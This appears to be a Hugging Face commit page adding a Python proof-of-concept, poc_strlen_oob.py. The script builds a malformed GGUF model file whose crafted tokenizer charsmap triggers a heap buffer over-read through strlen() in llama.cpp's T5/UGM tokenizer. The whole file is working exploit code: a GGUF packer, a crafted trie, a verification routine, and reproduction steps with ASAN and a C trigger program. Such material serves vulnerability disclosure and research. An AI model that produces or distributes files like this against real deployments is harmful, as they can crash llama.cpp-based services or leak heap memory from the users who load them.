salvepilo commited on
Commit
2e555e8
·
verified ·
1 Parent(s): 30982be

Upload poc_strlen_oob.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_strlen_oob.py +571 -0
poc_strlen_oob.py ADDED
@@ -0,0 +1,571 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Heap buffer over-read via strlen() on unterminated precompiled_charsmap
4
+ in llama.cpp's UGM (T5) tokenizer.
5
+
6
+ Vulnerability location:
7
+ src/llama-vocab.cpp, function normalize_prefix(), around line 1128-1129:
8
+
9
+ const char * prefix_replacement = &(tokenizer.prefix_replacements)[longest_prefix_offset];
10
+ return { prefix_replacement, strlen(prefix_replacement), longest_prefix_length };
11
+
12
+ The precompiled_charsmap is loaded from GGUF metadata at lines 1823-1825 without
13
+ any validation that replacement strings are null-terminated. When the XCDA trie
14
+ matches an input prefix and yields a replacement-string offset that points to data
15
+ near the end of the buffer with no trailing NUL byte, strlen() reads past the end
16
+ of the heap allocation.
17
+
18
+ Exploit path:
19
+ 1. A GGUF file sets tokenizer.ggml.model = "t5" to select the UGM tokenizer.
20
+ 2. tokenizer.ggml.precompiled_charsmap contains a crafted binary blob:
21
+ [4 bytes: xcda_blob_size (uint32 LE)]
22
+ [xcda_blob_size bytes: XCDA trie entries (uint32 LE each)]
23
+ [remaining bytes: prefix_replacements string table]
24
+ 3. The XCDA trie is constructed so that the ASCII character 'A' (0x41) matches
25
+ a single-character prefix whose replacement-string offset points to the very
26
+ last byte of the prefix_replacements region -- a byte that is NOT followed by
27
+ a NUL terminator.
28
+ 4. When the model tokenizes any text containing 'A', normalize_prefix() walks
29
+ the XCDA, finds the match, passes the bounds check (offset < size), then
30
+ calls strlen() which reads past the buffer boundary.
31
+
32
+ XCDA bit-packing (per uint32_t entry):
33
+ bits 10-30: BASE value (21 bits)
34
+ bit 9: BASE shift flag (if set, BASE is shifted left by 8)
35
+ bit 8: LEAF flag
36
+ bits 0-7: LCHECK value
37
+ For value nodes (referenced when LEAF=1):
38
+ bits 0-30: replacement string offset into prefix_replacements
39
+ bit 31: (flag, masked out by get_value)
40
+
41
+ Trie walk for input character c:
42
+ node_index = get_base(root) # start from root
43
+ node_index ^= c # XOR with character value
44
+ check get_lcheck(node_index) == c # verify parentage
45
+ is_leaf = get_leaf(node_index)
46
+ node_index ^= get_base(node_index) # descend
47
+ if is_leaf:
48
+ offset = get_value(node_index) # read replacement offset
49
+
50
+ This PoC constructs a minimal GGUF file that triggers the bug when loaded
51
+ with vocab_only=true and any text containing 'A' is tokenized.
52
+
53
+ Usage:
54
+ python3 poc_strlen_oob.py # generates poc_strlen_oob.gguf
55
+ # Then in llama.cpp build directory:
56
+ # ./bin/llama-cli -m poc_strlen_oob.gguf --vocab-only -p "A" 2>&1
57
+ # (will crash or ASAN will report heap-buffer-overflow)
58
+ """
59
+
60
+ import struct
61
+ import os
62
+ import sys
63
+
64
+ # --------------------------------------------------------------------------- #
65
+ # GGUF binary format constants
66
+ # --------------------------------------------------------------------------- #
67
+ GGUF_MAGIC = 0x46554747 # "GGUF" in little-endian
68
+ GGUF_VERSION = 3
69
+
70
+ # GGUFValueType enum
71
+ GGUF_TYPE_UINT8 = 0
72
+ GGUF_TYPE_INT8 = 1
73
+ GGUF_TYPE_UINT16 = 2
74
+ GGUF_TYPE_INT16 = 3
75
+ GGUF_TYPE_UINT32 = 4
76
+ GGUF_TYPE_INT32 = 5
77
+ GGUF_TYPE_FLOAT32 = 6
78
+ GGUF_TYPE_BOOL = 7
79
+ GGUF_TYPE_STRING = 8
80
+ GGUF_TYPE_ARRAY = 9
81
+ GGUF_TYPE_UINT64 = 10
82
+ GGUF_TYPE_INT64 = 11
83
+ GGUF_TYPE_FLOAT64 = 12
84
+
85
+ # GGML quantization types
86
+ GGML_TYPE_F32 = 0
87
+
88
+ ALIGNMENT = 32
89
+
90
+
91
+ def pack_string(s: str) -> bytes:
92
+ """Pack a GGUF string value: uint64 length + raw UTF-8 bytes."""
93
+ encoded = s.encode("utf-8")
94
+ return struct.pack("<Q", len(encoded)) + encoded
95
+
96
+
97
+ def pack_kv_string(key: str, value: str) -> bytes:
98
+ """Pack a complete KV pair with string value."""
99
+ return pack_string(key) + struct.pack("<I", GGUF_TYPE_STRING) + pack_string(value)
100
+
101
+
102
+ def pack_kv_uint32(key: str, value: int) -> bytes:
103
+ """Pack a complete KV pair with uint32 value."""
104
+ return pack_string(key) + struct.pack("<I", GGUF_TYPE_UINT32) + struct.pack("<I", value)
105
+
106
+
107
+ def pack_kv_float32(key: str, value: float) -> bytes:
108
+ """Pack a complete KV pair with float32 value."""
109
+ return pack_string(key) + struct.pack("<I", GGUF_TYPE_FLOAT32) + struct.pack("<f", value)
110
+
111
+
112
+ def pack_kv_int8_array(key: str, data: bytes) -> bytes:
113
+ """Pack a complete KV pair with an array of int8 (used for precompiled_charsmap)."""
114
+ result = pack_string(key)
115
+ result += struct.pack("<I", GGUF_TYPE_ARRAY) # value type = ARRAY
116
+ result += struct.pack("<I", GGUF_TYPE_UINT8) # array element type = UINT8
117
+ result += struct.pack("<Q", len(data)) # array length
118
+ result += data # raw bytes
119
+ return result
120
+
121
+
122
+ def pack_kv_string_array(key: str, strings: list) -> bytes:
123
+ """Pack a complete KV pair with an array of strings."""
124
+ result = pack_string(key)
125
+ result += struct.pack("<I", GGUF_TYPE_ARRAY)
126
+ result += struct.pack("<I", GGUF_TYPE_STRING)
127
+ result += struct.pack("<Q", len(strings))
128
+ for s in strings:
129
+ result += pack_string(s)
130
+ return result
131
+
132
+
133
+ def pack_kv_float32_array(key: str, values: list) -> bytes:
134
+ """Pack a complete KV pair with an array of float32."""
135
+ result = pack_string(key)
136
+ result += struct.pack("<I", GGUF_TYPE_ARRAY)
137
+ result += struct.pack("<I", GGUF_TYPE_FLOAT32)
138
+ result += struct.pack("<Q", len(values))
139
+ for v in values:
140
+ result += struct.pack("<f", v)
141
+ return result
142
+
143
+
144
+ def pack_kv_int32_array(key: str, values: list) -> bytes:
145
+ """Pack a complete KV pair with an array of int32."""
146
+ result = pack_string(key)
147
+ result += struct.pack("<I", GGUF_TYPE_ARRAY)
148
+ result += struct.pack("<I", GGUF_TYPE_INT32)
149
+ result += struct.pack("<Q", len(values))
150
+ for v in values:
151
+ result += struct.pack("<i", v)
152
+ return result
153
+
154
+
155
+ # --------------------------------------------------------------------------- #
156
+ # XCDA trie construction helpers
157
+ # --------------------------------------------------------------------------- #
158
+
159
+ def pack_xcda_node(base: int, lcheck: int, leaf: bool, base_shift: bool = False) -> int:
160
+ """
161
+ Pack an XCDA node into a uint32.
162
+
163
+ Layout:
164
+ bits 10-30: BASE (21 bits, before optional shift)
165
+ bit 9: shift flag (if 1, actual BASE = stored_base << 8)
166
+ bit 8: LEAF flag
167
+ bits 0-7: LCHECK
168
+
169
+ When base_shift=False: stored_base = base, actual = stored_base << 0
170
+ When base_shift=True: stored_base = base >> 8, actual = stored_base << 8
171
+ """
172
+ assert 0 <= lcheck <= 0xFF
173
+ assert 0 <= base <= 0x1FFFFF # 21 bits max for stored base
174
+
175
+ packed = 0
176
+ if base_shift:
177
+ stored_base = base >> 8
178
+ packed |= (stored_base & 0x1FFFFF) << 10
179
+ packed |= (1 << 9) # shift flag
180
+ else:
181
+ packed |= (base & 0x1FFFFF) << 10
182
+ # bit 9 = 0 (no shift)
183
+
184
+ if leaf:
185
+ packed |= (1 << 8)
186
+
187
+ packed |= (lcheck & 0xFF)
188
+ return packed
189
+
190
+
191
+ def pack_xcda_value_node(offset: int) -> int:
192
+ """
193
+ Pack a value node. get_value() returns packed & 0x7FFFFFFF.
194
+ The offset is the index into prefix_replacements.
195
+ """
196
+ assert 0 <= offset <= 0x7FFFFFFF
197
+ return offset
198
+
199
+
200
+ # --------------------------------------------------------------------------- #
201
+ # Build the malicious precompiled_charsmap
202
+ # --------------------------------------------------------------------------- #
203
+
204
+ def build_malicious_charsmap() -> bytes:
205
+ """
206
+ Build a precompiled_charsmap blob that triggers OOB read via strlen().
207
+
208
+ The XCDA trie matches the single ASCII character 'A' (0x41) and returns
209
+ a replacement string offset pointing to the last byte of the
210
+ prefix_replacements section, which has NO null terminator.
211
+
212
+ IMPORTANT: During model loading, llama.cpp tokenizes "\\n" to determine
213
+ the newline token ID (line 2180 of llama-vocab.cpp). This means the XCDA
214
+ trie is walked for character 0x0A during init. We must ensure the array
215
+ is large enough that BASE_root ^ c doesn't go out of bounds for ANY
216
+ single-byte character. We use BASE_root = 0, so the child index for
217
+ character c is simply c. The array needs 256 entries to be safe.
218
+
219
+ XCDA array layout (256 entries):
220
+ [0] Root node: BASE=0, LCHECK=0, LEAF=0
221
+ [0x41] Child for 'A': LCHECK=0x41, LEAF=1, BASE=3
222
+ After XOR: node_index = 0x41 ^ 3 = 0x42
223
+ [0x42] Value node: offset pointing to last byte of prefix_replacements
224
+ All other entries: 0 (LCHECK=0, won't match any non-zero char)
225
+
226
+ Trie walk for input 'A' (c=0x41):
227
+ 1. node_index = get_base(0) = 0
228
+ 2. node_index ^= 0x41 => 0x41
229
+ 3. get_lcheck(0x41) = 0x41 => matches!
230
+ 4. get_leaf(0x41) = true
231
+ 5. node_index ^= get_base(0x41) => 0x41 ^ 3 = 0x42
232
+ 6. get_value(0x42) = replacement_offset => points to unterminated data
233
+
234
+ Trie walk for any other char c (e.g. '\\n' = 0x0A):
235
+ 1. node_index = get_base(0) = 0
236
+ 2. node_index ^= c => c
237
+ 3. get_lcheck(c) = 0 (entry is all zeros) => 0 != c => break
238
+ => No match, falls through to UTF-8 passthrough. Safe.
239
+
240
+ prefix_replacements: non-NUL bytes with NO trailing NUL terminator.
241
+ """
242
+
243
+ # Build XCDA array: 256 entries, all zeros except the ones we need
244
+ NUM_ENTRIES = 256
245
+ xcda = [0] * NUM_ENTRIES
246
+
247
+ # Root (index 0): BASE=0, LEAF=0, LCHECK=0
248
+ # With BASE=0, for character c, node_index = 0 ^ c = c
249
+ # So the child for 'A' (0x41) is at index 0x41
250
+ xcda[0] = pack_xcda_node(base=0, lcheck=0x00, leaf=False)
251
+
252
+ # Child for 'A' at index 0x41:
253
+ # LCHECK=0x41 (must match character)
254
+ # LEAF=1 (this completes a match)
255
+ # BASE=3 (after XOR: 0x41 ^ 3 = 0x42, the value node)
256
+ xcda[0x41] = pack_xcda_node(base=3, lcheck=0x41, leaf=True)
257
+
258
+ # Value node at index 0x42:
259
+ # get_value() returns packed & 0x7FFFFFFF = the replacement offset
260
+ # We point to the last byte of prefix_replacements (no NUL follows).
261
+ replacement_offset = 7
262
+ xcda[0x42] = pack_xcda_value_node(replacement_offset)
263
+
264
+ # Pack all entries
265
+ xcda_entries = struct.pack("<" + "I" * NUM_ENTRIES, *xcda)
266
+ xcda_blob_size = len(xcda_entries) # 256 * 4 = 1024 bytes
267
+
268
+ # prefix_replacements: 8 bytes of non-NUL data, NO null terminator
269
+ # The replacement offset (7) points to the 8th byte (index 7).
270
+ # strlen() starts there, finds 'B' (0x42), then reads PAST the buffer
271
+ # looking for a NUL that doesn't exist.
272
+ prefix_replacements = b"\x42" * 8 # 'B' * 8, no NUL
273
+
274
+ # Full charsmap: [uint32 xcda_blob_size] [xcda_entries] [prefix_replacements]
275
+ charsmap = struct.pack("<I", xcda_blob_size) + xcda_entries + prefix_replacements
276
+
277
+ return charsmap
278
+
279
+
280
+ # --------------------------------------------------------------------------- #
281
+ # Verify the trie walk in Python (sanity check)
282
+ # --------------------------------------------------------------------------- #
283
+
284
+ def verify_trie_walk(charsmap: bytes):
285
+ """Simulate the C++ trie walk to verify our XCDA is correct."""
286
+
287
+ # Parse charsmap
288
+ xcda_blob_size = struct.unpack_from("<I", charsmap, 0)[0]
289
+ charsmap_offset = 4
290
+ xcda_array = []
291
+ for i in range(xcda_blob_size // 4):
292
+ val = struct.unpack_from("<I", charsmap, charsmap_offset + i * 4)[0]
293
+ xcda_array.append(val)
294
+ prefix_replacements_offset = 4 + xcda_blob_size
295
+ prefix_replacements_size = len(charsmap) - prefix_replacements_offset
296
+ prefix_replacements = charsmap[prefix_replacements_offset:]
297
+
298
+ print(f"[*] Charsmap total size: {len(charsmap)} bytes")
299
+ print(f"[*] XCDA blob size: {xcda_blob_size} bytes ({xcda_blob_size // 4} entries)")
300
+ non_zero = {i: x for i, x in enumerate(xcda_array) if x != 0}
301
+ print(f"[*] XCDA non-zero entries: { {i: '0x%08X' % x for i, x in non_zero.items()} }")
302
+ print(f"[*] prefix_replacements size: {prefix_replacements_size} bytes")
303
+ print(f"[*] prefix_replacements (hex): {prefix_replacements.hex()}")
304
+ print(f"[*] prefix_replacements contains NUL: {0 in prefix_replacements}")
305
+ print()
306
+
307
+ def get_base(index):
308
+ packed = xcda_array[index]
309
+ return (packed >> 10) << ((packed & (1 << 9)) >> 6)
310
+
311
+ def get_lcheck(index):
312
+ packed = xcda_array[index]
313
+ return packed & ((1 << 31) | 0xFF)
314
+
315
+ def get_leaf(index):
316
+ packed = xcda_array[index]
317
+ return bool((packed >> 8) & 1)
318
+
319
+ def get_value(index):
320
+ packed = xcda_array[index]
321
+ return packed & ((1 << 31) - 1)
322
+
323
+ # Simulate walk for character 'A' (0x41)
324
+ input_char = ord('A')
325
+ print(f"[*] Simulating trie walk for character 'A' (0x{input_char:02X})...")
326
+
327
+ node_index = 0
328
+ base_root = get_base(node_index)
329
+ print(f" Root node[0] packed=0x{xcda_array[0]:08X}, get_base(0)={base_root}")
330
+ node_index = base_root
331
+
332
+ c = input_char
333
+ node_index ^= c
334
+ print(f" node_index ^= 0x{c:02X} => node_index = {node_index}")
335
+
336
+ lcheck = get_lcheck(node_index)
337
+ print(f" node[{node_index}] packed=0x{xcda_array[node_index]:08X}")
338
+ print(f" get_lcheck({node_index}) = 0x{lcheck:08X}")
339
+ if lcheck != c:
340
+ print(f" [!] LCHECK mismatch: 0x{lcheck:X} != 0x{c:X}")
341
+ return False
342
+ print(f" LCHECK matches: 0x{lcheck:X} == 0x{c:X}")
343
+
344
+ is_leaf = get_leaf(node_index)
345
+ print(f" get_leaf({node_index}) = {is_leaf}")
346
+
347
+ base_child = get_base(node_index)
348
+ node_index ^= base_child
349
+ print(f" get_base({node_index ^ base_child}) = {base_child}")
350
+ print(f" node_index ^= {base_child} => node_index = {node_index}")
351
+
352
+ if is_leaf:
353
+ value = get_value(node_index)
354
+ print(f" node[{node_index}] packed=0x{xcda_array[node_index]:08X}")
355
+ print(f" get_value({node_index}) = {value}")
356
+ print(f" => longest_prefix_offset = {value}")
357
+ print(f" => Bounds check: {value} < {prefix_replacements_size} = {value < prefix_replacements_size}")
358
+ print(f" => String at offset {value}: {prefix_replacements[value:]!r}")
359
+ print(f" => Contains NUL after offset: {0 in prefix_replacements[value:]}")
360
+ if value < prefix_replacements_size and 0 not in prefix_replacements[value:]:
361
+ print()
362
+ print(f" [!] VULNERABILITY CONFIRMED: strlen() will read past buffer!")
363
+ print(f" [!] prefix_replacement points to byte {value} of {prefix_replacements_size}")
364
+ print(f" [!] No NUL terminator exists -- strlen() causes heap over-read")
365
+ return True
366
+ else:
367
+ print(f" [-] No vulnerability (null terminator present or offset OOB)")
368
+ return False
369
+ else:
370
+ print(f" [-] Not a leaf node, no match")
371
+ return False
372
+
373
+
374
+ # --------------------------------------------------------------------------- #
375
+ # Build the minimal GGUF file
376
+ # --------------------------------------------------------------------------- #
377
+
378
+ def build_gguf(charsmap: bytes, output_path: str):
379
+ """
380
+ Build a minimal GGUF file that:
381
+ - Sets architecture to "t5" (to trigger UGM tokenizer path)
382
+ - Provides the malicious precompiled_charsmap
383
+ - Includes minimal token vocabulary (pad, eos, unk + a normal token)
384
+ - Can be loaded with vocab_only=true (no tensors needed)
385
+ """
386
+
387
+ # ---- KV metadata ----
388
+ kv_pairs = bytearray()
389
+
390
+ # general.architecture = "t5"
391
+ # (Required: determines the model architecture for key formatting)
392
+ kv_pairs += pack_kv_string("general.architecture", "t5")
393
+
394
+ # tokenizer.ggml.model = "t5" (triggers LLAMA_VOCAB_TYPE_UGM)
395
+ kv_pairs += pack_kv_string("tokenizer.ggml.model", "t5")
396
+
397
+ # Token list: need at least 3 tokens for special token IDs:
398
+ # 0 = pad, 1 = eos, 2 = unk
399
+ # Plus some normal tokens for the tokenizer to work.
400
+ # The UGM tokenizer needs at least one normal token to avoid issues.
401
+ tokens = [
402
+ "<pad>", # 0 - pad token
403
+ "</s>", # 1 - eos token
404
+ "<unk>", # 2 - unk token
405
+ "\xe2\x96\x81A", # 3 - normal token: escaped_space + "A"
406
+ "\xe2\x96\x81B", # 4 - normal token: escaped_space + "B"
407
+ "A", # 5 - normal token: bare "A"
408
+ "B", # 6 - normal token: bare "B"
409
+ ]
410
+ kv_pairs += pack_kv_string_array("tokenizer.ggml.tokens", tokens)
411
+
412
+ # Token scores (float32 array, same length as tokens)
413
+ scores = [0.0, 0.0, 0.0, -1.0, -1.0, -2.0, -2.0]
414
+ kv_pairs += pack_kv_float32_array("tokenizer.ggml.scores", scores)
415
+
416
+ # Token types (int32 array):
417
+ # 1 = NORMAL, 2 = UNKNOWN, 3 = CONTROL, 4 = USER_DEFINED, 5 = UNUSED, 6 = BYTE
418
+ token_types = [
419
+ 3, # pad - CONTROL
420
+ 3, # eos - CONTROL
421
+ 2, # unk - UNKNOWN
422
+ 1, # normal
423
+ 1, # normal
424
+ 1, # normal
425
+ 1, # normal
426
+ ]
427
+ kv_pairs += pack_kv_int32_array("tokenizer.ggml.token_type", token_types)
428
+
429
+ # EOS token ID
430
+ kv_pairs += pack_kv_uint32("tokenizer.ggml.eos_token_id", 1)
431
+
432
+ # UNK token ID
433
+ kv_pairs += pack_kv_uint32("tokenizer.ggml.unknown_token_id", 2)
434
+
435
+ # Padding token ID
436
+ kv_pairs += pack_kv_uint32("tokenizer.ggml.padding_token_id", 0)
437
+
438
+ # The malicious precompiled_charsmap
439
+ kv_pairs += pack_kv_int8_array("tokenizer.ggml.precompiled_charsmap", charsmap)
440
+
441
+ n_kv = 9 # count of KV pairs above
442
+
443
+ # ---- Tensor info ----
444
+ # vocab_only mode: no tensors needed.
445
+ n_tensors = 0
446
+
447
+ # ---- Write GGUF file ----
448
+ with open(output_path, "wb") as f:
449
+ # Header
450
+ f.write(struct.pack("<I", GGUF_MAGIC)) # magic
451
+ f.write(struct.pack("<I", GGUF_VERSION)) # version
452
+ f.write(struct.pack("<Q", n_tensors)) # tensor count
453
+ f.write(struct.pack("<Q", n_kv)) # kv count
454
+
455
+ # KV data
456
+ f.write(kv_pairs)
457
+
458
+ # No tensor info, no tensor data
459
+
460
+ file_size = os.path.getsize(output_path)
461
+ print(f"[+] Written GGUF file: {output_path} ({file_size} bytes)")
462
+
463
+
464
+ # --------------------------------------------------------------------------- #
465
+ # Main
466
+ # --------------------------------------------------------------------------- #
467
+
468
+ def main():
469
+ print("=" * 72)
470
+ print("PoC: Heap buffer over-read via strlen() on unterminated")
471
+ print(" precompiled_charsmap in llama.cpp UGM tokenizer")
472
+ print("=" * 72)
473
+ print()
474
+ print("Vulnerability: src/llama-vocab.cpp, normalize_prefix()")
475
+ print(" Line ~1128-1129:")
476
+ print(' const char * prefix_replacement = ')
477
+ print(' &(tokenizer.prefix_replacements)[longest_prefix_offset];')
478
+ print(' return { prefix_replacement, strlen(prefix_replacement), ')
479
+ print(' longest_prefix_length };')
480
+ print()
481
+ print("The precompiled_charsmap blob is loaded from GGUF metadata without")
482
+ print("validating that replacement strings are null-terminated. If the XCDA")
483
+ print("trie matches an input prefix and returns an offset pointing to data")
484
+ print("near the buffer end with no NUL byte, strlen() reads past the heap")
485
+ print("allocation boundary.")
486
+ print()
487
+
488
+ # Step 1: Build the malicious charsmap
489
+ print("-" * 72)
490
+ print("Step 1: Building malicious precompiled_charsmap")
491
+ print("-" * 72)
492
+ charsmap = build_malicious_charsmap()
493
+
494
+ # Step 2: Verify the trie walk
495
+ print()
496
+ print("-" * 72)
497
+ print("Step 2: Verifying XCDA trie walk (Python simulation)")
498
+ print("-" * 72)
499
+ print()
500
+ vuln_confirmed = verify_trie_walk(charsmap)
501
+ print()
502
+
503
+ if not vuln_confirmed:
504
+ print("[!] Trie verification failed. Aborting.")
505
+ sys.exit(1)
506
+
507
+ # Step 3: Build the GGUF file
508
+ print("-" * 72)
509
+ print("Step 3: Building malicious GGUF file")
510
+ print("-" * 72)
511
+ output_dir = os.path.dirname(os.path.abspath(__file__))
512
+ output_path = os.path.join(output_dir, "poc_strlen_oob.gguf")
513
+ build_gguf(charsmap, output_path)
514
+
515
+ # Step 4: Print reproduction instructions
516
+ print()
517
+ print("-" * 72)
518
+ print("Step 4: Reproduction")
519
+ print("-" * 72)
520
+ print()
521
+ print("To trigger the vulnerability, load the GGUF file and tokenize any")
522
+ print("text containing 'A'. The XCDA trie will match 'A' and return a")
523
+ print("replacement-string offset pointing to the last byte of the")
524
+ print("prefix_replacements buffer which has no null terminator.")
525
+ print()
526
+ print("With AddressSanitizer (ASAN):")
527
+ print()
528
+ print(f" # Build llama.cpp with ASAN:")
529
+ print(f" cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON")
530
+ print(f" cmake --build build")
531
+ print(f"")
532
+ print(f" # Trigger with the simple tokenize tool:")
533
+ print(f" ./build/bin/llama-cli \\")
534
+ print(f" -m {output_path} \\")
535
+ print(f" --vocab-only \\")
536
+ print(f" -p \"Hello A world\"")
537
+ print()
538
+ print("Expected ASAN output:")
539
+ print(" ==PID==ERROR: AddressSanitizer: heap-buffer-overflow")
540
+ print(" READ of size N at 0xADDR")
541
+ print(" #0 strlen")
542
+ print(" #1 llm_tokenizer_ugm_session::normalize_prefix()")
543
+ print()
544
+ print("Without ASAN, the over-read may:")
545
+ print(" - Silently leak heap data into replacement strings")
546
+ print(" - Cause a segfault if the read crosses a page boundary")
547
+ print(" - Produce garbled tokenization output")
548
+ print()
549
+ print("Alternatively, use a simple C program to load vocab_only and tokenize:")
550
+ print()
551
+ print(" // trigger.c")
552
+ print(" #include \"llama.h\"")
553
+ print(" int main() {")
554
+ print(" llama_backend_init();")
555
+ print(" struct llama_model_params mp = llama_model_default_params();")
556
+ print(" mp.vocab_only = true;")
557
+ print(f' struct llama_model * m = llama_model_load_from_file("{output_path}", mp);')
558
+ print(" const struct llama_vocab * v = llama_model_get_vocab(m);")
559
+ print(" llama_token tokens[64];")
560
+ print(' int n = llama_tokenize(v, "A", 1, tokens, 64, false, true);')
561
+ print(" llama_model_free(m);")
562
+ print(" llama_backend_free();")
563
+ print(" }")
564
+ print()
565
+ print("=" * 72)
566
+ print("PoC generation complete.")
567
+ print("=" * 72)
568
+
569
+
570
+ if __name__ == "__main__":
571
+ main()